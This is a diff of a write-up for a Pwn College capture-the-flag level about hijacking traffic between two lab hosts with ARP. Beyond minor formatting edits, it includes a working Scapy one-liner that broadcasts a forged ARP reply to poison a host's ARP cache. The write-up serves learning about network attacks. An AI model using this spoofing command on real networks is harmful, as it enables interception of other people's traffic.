Kunull/Writeups/docs/Pwn College/Intercepting Communication.md

 ## level 13

-> Hijack traffic from a remote host using ARP
+> In this challenge you will hijack traffic from a remote host using ARP.\
+> You do not have the capabilities of a NET ADMIN.\
+> The remote host at `10.0.0.4` is communicating with the remote host at `10.0.0.2` on port `31337`.

 In this level we have to achieve the same goal as level 7.
 However, we don't have the ability to add addresses as we are not the net admin.

-Therefore we will have to create an ARP packet from scratch and send it to the host on 10.0.0.4.
+Therefore we will have to create an ARP packet from scratch and send it to the host on `10.0.0.4`.

 ```python
 >>> sendp(Ether(src="76:45:f9:f1:45:de", dst="ff:ff:ff:ff:ff:ff") / ARP(op="is-at", psrc="10.0.0.2", hwsrc="76:45:f9:f1:45:de") / IP(src="10.0.0.3", dst="10.0.0.4"), iface="eth0")